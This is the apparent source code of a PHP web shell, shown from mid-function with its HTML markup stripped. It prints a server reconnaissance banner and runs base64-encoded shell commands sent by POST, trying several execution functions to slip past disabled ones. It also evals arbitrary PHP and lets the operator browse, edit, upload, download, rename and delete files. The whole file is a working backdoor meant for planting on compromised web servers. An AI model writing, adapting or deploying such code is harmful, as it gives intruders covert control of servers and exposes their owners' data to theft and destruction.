array('pipe', 'w')), $pipes); $output = stream_get_contents($pipes[1]); $return_var = proc_close($process); break; case 'popen': $handle = popen($command, 'r'); $output = stream_get_contents($handle); $return_var = pclose($handle); break; case 'pcntl_exec': break; case 'backtick': $output = `$command`; $return_var = strlen($output); // backtick operator doesn't provide a return_var break; } // If the command was executed successfully, break out of the loop //echo "Command: $command\n
"; if ( (is_array($output) && count($output) > 0) || (!is_array($output) && strlen($output) > 0 ) ){ echo "Command: $command\n
"; echo "used Exxecution Method: $method\n
"; $_SESSION["method"] = $method; break; } } return $output; } function createDirectoryLinks($directory) { $sections = explode(DIRECTORY_SEPARATOR, $directory); $currentPath = ''; $links = ''; foreach ($sections as $section) { if (!empty($section)) { $currentPath .= DIRECTORY_SEPARATOR . $section; $links .= DIRECTORY_SEPARATOR ."" . $section . ""; } } return $links; } function getFilePermissionsString($itemPath) { $permissions = fileperms($itemPath); // Get the file type $fileType = ''; if (is_dir($itemPath)) { $fileType = 'd'; } elseif (is_link($itemPath)) { $fileType = 'l'; } else { $fileType = '-'; } // Convert integer permissions to string representation $permissionString = $fileType; // Owner permissions $permissionString .= ($permissions & 0x0100) ? 'r' : '-'; $permissionString .= ($permissions & 0x0080) ? 'w' : '-'; $permissionString .= ($permissions & 0x0040) ? (($permissions & 0x0800) ? 's' : 'x') : (($permissions & 0x0800) ? 'S' : '-'); // Group permissions $permissionString .= ($permissions & 0x0020) ? 'r' : '-'; $permissionString .= ($permissions & 0x0010) ? 'w' : '-'; $permissionString .= ($permissions & 0x0008) ? (($permissions & 0x0400) ? 's' : 'x') : (($permissions & 0x0400) ? 'S' : '-'); // Others permissions $permissionString .= ($permissions & 0x0004) ? 'r' : '-'; $permissionString .= ($permissions & 0x0002) ? 'w' : '-'; $permissionString .= ($permissions & 0x0001) ? (($permissions & 0x0200) ? 't' : 'x') : (($permissions & 0x0200) ? 'T' : '-'); return $permissionString; } function getGroupInfo($path) { $gid = filegroup($path); $groupInfo = array(); if (file_exists('/etc/group')) { $handle = fopen('/etc/group', 'r'); while (($line = fread($handle, 1024)) !== false) { $fields = explode(':', $line); if ($fields[2] == $gid) { $groupInfo['name'] = $fields[0]; break; } } fclose($handle); } return $groupInfo['name']; } function getOwnerInfo($path,$isuname = false) { if(fileowner("..") == fileowner($path)){ $isuname = true; } $uid = fileowner($path); $userInfo = array(); if (function_exists('getpwuid')) { $userInfo = getpwuid($uid); return $userInfo['name']; } else { // Fallback method using script path $scriptPath = __FILE__; // Get the current script path if ($isuname && strpos($scriptPath, '/home/') !== false) { $owner = substr($scriptPath, strpos($scriptPath, '/home/') + 6); $owner = substr($owner, 0, strpos($owner, '/')); return $owner; } else { // Default fallback $userInfo['name'] = 'User_' . $uid; return $userInfo['name']; } } } // Fetch directory listing using ls -liah command function getDirectoryListing($directory) { $directoryContents = scandir($directory); $lsOutput = ""; $directories = array(); $files = array(); $x = 0; foreach ($directoryContents as $item) { $x++; $itemPath = $directory . '/' . $item; $itemInfo = pathinfo($itemPath); $permissions = getFilePermissionsString($itemPath); $owner = (function_exists('posix_getpwuid')) ? posix_getpwuid(fileowner($itemPath))['name'] : getOwnerInfo($itemPath); $group = (function_exists('posix_getgrgid')) ? posix_getgrgid(filegroup($itemPath))['name'] : getGroupInfo($itemPath); $size = filesize($itemPath); if ($size < 1024) { $sString = $size . " B"; } elseif ($size < 1048576) { $sString = round($size / 1024, 2) . " KB"; } elseif ($size < 1073741824) { $sString = round($size / 1048576, 2) . " MB"; } else { $sString = round($size / 1073741824, 2) . " GB"; } $sString = str_replace(" ", "", $sString); //echo "[[$sString]]"; $modifiedTime = date('Y-m-d H:i:s', filemtime($itemPath)); if(substr($permissions, 0, 1)=="d"){ $item = "[$item]"; } $line = sprintf( "%d[+]%s[+]%s[+]%s[+]%s[+]%s[+]%s", $x, $item, $owner, $group, $sString, $permissions, $modifiedTime ); if(substr($permissions, 0, 1)=="d"){ $directories[] = $line; }else{ $files[] = $line; } } $lsOutput = implode("\n", $directories); $lsOutput .= "\n".implode("\n", $files); return $lsOutput; } function forceDownload($filePath) { if (file_exists($filePath)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($filePath) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($filePath)); readfile($filePath); exit; } } echo << td, tr{ font-size: small; } body { font-family: Arial, sans-serif; background-color: #1a1d23; color: #fff; padding: 20px; margin: 0; box-sizing: border-box; } h1, h2, h3, h4, h5, h6 { color: #fff; margin-bottom: 10px; } h1 { font-size: 36px; } h2, .underlink { font-size: 24px; } h3 { font-size: 18px; } h4, div { font-size: 16px; } h5 { font-size: 14px; } h6 { font-size: 12px; } p { font-size: 16px; margin-bottom: 20px; } a { color: #fff; text-decoration: none; transition: color 0.2s ease; } a:hover { color: #ccc; } table { border-collapse: collapse; width: 100%; margin-bottom: 20px; } th, td { border: 1px solid #333; padding: 10px; text-align: left; } th { background-color: #333; color: #fff; } td { border-color: #333; } tr:nth-child(even) { background-color: #333; } tr:nth-child(odd) { background-color: #444; } tr:hover { background-color: #555; } tr:hover td { background-color: #666; } tr:hover th { background-color: #777; } button { background-color: #333; color: #fff; border: none; padding: 10px 20px; font-size: 16px; cursor: pointer; } button:hover { background-color: #444; } input[type="text"] { padding: 10px; border: 1px solid #333; width: 30%; font-size: 16px; } input[type="submit"] { background-color: #333; color: #fff; border: none; padding: 10px 20px; font-size: 16px; cursor: pointer; } input[type="submit"]:hover { background-color: #444; } head; // PHP version echo "PHP Version: " . phpversion() . "
"; // Linux version $linuxVersion = php_uname('a'); echo "Linux Version: " . $linuxVersion . "
"; // Uname $uname = php_uname('s'); echo "Uname: " . $uname . "
"; // User $user = (function_exists('posix_getpwuid')) ? posix_getpwuid(fileowner(".."))['name'] : getOwnerInfo("..", true); echo "User: " . $user . "
"; // Hostname $hostname = gethostname(); echo "Hostname: " . $hostname . "
"; // Disabled PHP functions $disabledFunctions = ini_get('disable_functions'); echo "Disabled PHP Functions: " . $disabledFunctions . "
"; // Initialize array to store previous working directories if (!isset($_SESSION['prevDirs'])) { $_SESSION['prevDirs'] = []; } // Set default working directory $workingDir = isset($_SESSION['workingDir']) ? $_SESSION['workingDir'] : __DIR__; // Handle change of working directory if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["newdir"])) { $newDir = $_POST["newdir"]; if (is_dir($newDir)) { // Check if the new directory is already in previous directories if (!in_array($newDir, $_SESSION['prevDirs'])) { $_SESSION['prevDirs'][] = $workingDir; } $workingDir = realpath($newDir); $_SESSION['workingDir'] = $workingDir; } else { echo "Invalid directory!"; } } // Handle file upload if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["file"])) { $uploadDir = $workingDir . '/'; $uploadFile = $uploadDir . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile)) { echo "File uploaded successfully.\n"; } else { echo "Error uploading file.\n"; } } // Execute command if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["command"])) { chdir($workingDir); //$commandOutput = exCommand('/bin/cd ' . escapeshellarg($workingDir) . ' && ' . $_POST["command"]); $commandOutput = exCommand(base64_decode($_POST["command"])); if(is_array($commandOutput)){ echo implode("\n
", $commandOutput); }else{ echo "
$commandOutput
"; } } // Handle file actions and directory listing // Handle file actions and directory listing if (isset($_GET['action']) && isset($_GET['filename'])) { $action = $_GET['action']; $filename = $_GET['filename']; switch ($action) { case 'E': // Edit file action $filePath = $workingDir . '/' . $filename; if (is_file($filePath)) { if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["file_content"])) { // Save file content if form is submitted $fileContent = $_POST["file_content"]; if (file_put_contents($filePath, $fileContent) !== false) { echo "File saved successfully: $filename"; } else { echo "Error saving file: $filename"; } } else { // Display file content in form for editing $fileContent = file_get_contents($filePath); $fileContentSafe = htmlspecialchars($fileContent); echo "

Edit File: $filename

"; echo "
"; echo "
"; echo ""; echo "
"; } } else { echo "File not found: $filename"; } break; case 'Del': // Delete file action $filePath = $workingDir . '/' . $filename; if (is_file($filePath)) { if (unlink($filePath)) { echo "File deleted successfully: $filename"; } else { echo "Error deleting file: $filename"; } } else { echo "File not found: $filename"; } break; case 'Dow': // Download file action $filePath = $workingDir . '/' . $filename; if (is_file($filePath)) { forceDownload($filePath); } else { echo "File not found: $filename"; } break; case 'R': // Handle rename file action if (isset($_GET['action']) && $_GET['action'] === 'R') { $filename = isset($_GET['filename']) ? $_GET['filename'] : ''; $newname = isset($_GET['newname']) ? $_GET['newname'] : 'new'; if (!empty($filename)) { // Implement your logic for renaming file here rename($filename, $newname); echo "renamed successfully from $filename to $newname"; } } break; default: echo "Invalid action."; break; } } // Include the current working directory in the list of previous directories if it's not already listed if (!in_array($workingDir, $_SESSION['prevDirs'])) { $_SESSION['prevDirs'][] = $workingDir; } // Update working directory if a previous directory link is clicked if (isset($_GET['newdir'])) { $newDir = $_GET['newdir']; if (in_array($newDir, $_SESSION['prevDirs'])) { $workingDir = $newDir; $_SESSION['workingDir'] = $workingDir; } } // Get the directory listing $lsOutput = getDirectoryListing($workingDir); // Display directory listing in a table with single-line borders $wd = __DIR__; echo "

Contents of ".createDirectoryLinks($workingDir).": [Home Dir]

"; // Get the current page number from the URL $currentPage = isset($_GET['page']) ? (int)$_GET['page'] : 1; // Set the number of entries per page $entriesPerPage = 30; // Split the $fileLines array into pages $fileLinePages = array_chunk(explode("\n", $lsOutput), $entriesPerPage); // Display the current page echo ""; foreach ($fileLinePages[$currentPage - 1] as $index => $line) { // Skip empty lines if (empty(trim($line))) continue; $columns = explode("[+]", $line);//preg_split('/\s+/', $line, -1, PREG_SPLIT_NO_EMPTY); echo ""; foreach ($columns as $colIndex => $column) { if ($colIndex == count($columns) - 1) { // Last column (filename) echo ""; if ($index >= 0) { // Actions for subsequent rows //echo $columns[5]; if (substr($columns[5], 0, 1) != 'd') { // If not a directory, include actions echo '"; } elseif($columns[1]=="[.]" || $columns[1]=="[..]"){ echo ''; }else{ $dirName = str_replace("[", "", $columns[1]); $dirName = str_replace("]", "", $dirName); echo '"; } } } else { // Other columns if(substr($column[0], 0, 1) == '['){ //make it clickable to change directory $dirName = str_replace("[", "", $column); $dirName = str_replace("]", "", $dirName); if($dirName==".."){ $dirName = getUpperDirectory($workingDir); }elseif($dirName !="."){ $dirName = $workingDir."/".$dirName; } if ($dirName=="."){ echo ""; }else{ echo ""; } }else{ echo ""; } } } echo ""; } echo "
$column'; echo "  E | "; echo "Del | "; echo "Dow | "; echo "R  "; echo " '; echo "Download | "; echo "Rename  "; echo "[.]$column$column
"; // Display pagination links echo "
"; // Calculate total pages and current page range $totalPages = count($fileLinePages); $currentPage = isset($_GET['page']) ? (int)$_GET['page'] : 1; $range = 11; // Number of pages to show before and after the current page // Display previous ten pages link if ($currentPage > $range) { echo "< "; } else { echo "< "; } // Display page numbers for ($page = max(1, $currentPage - $range); $page <= min($totalPages, $currentPage + $range); $page++) { echo "$page "; } // Display next ten pages link if ($currentPage + $range < $totalPages) { echo "next ten>> "; } else { echo "next ten>> "; } echo "(total pages: $totalPages)"; echo "


"; // Change Working Directory form echo "
"; echo ""; echo ""; echo ""; echo "
"; // Upload form echo "

Upload a File

"; echo "
"; echo ""; echo ""; echo "
"; // Command Execution form echo "

Execute Command

"; echo "
"; echo ""; echo ""; echo ""; echo "
"; // PHP Eval form echo "

Evaluate PHP Code

"; echo "
"; echo ""; echo ""; echo ""; echo "
"; if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["php_code"])) { $phpCode = $_POST["php_code"]; try { ob_start(); eval($phpCode); $output = ob_get_clean(); echo "

Output:

"; echo "
$output
"; } catch (Exception $e) { echo "

Error:

"; echo "
" . $e->getMessage() . "
"; } } echo <<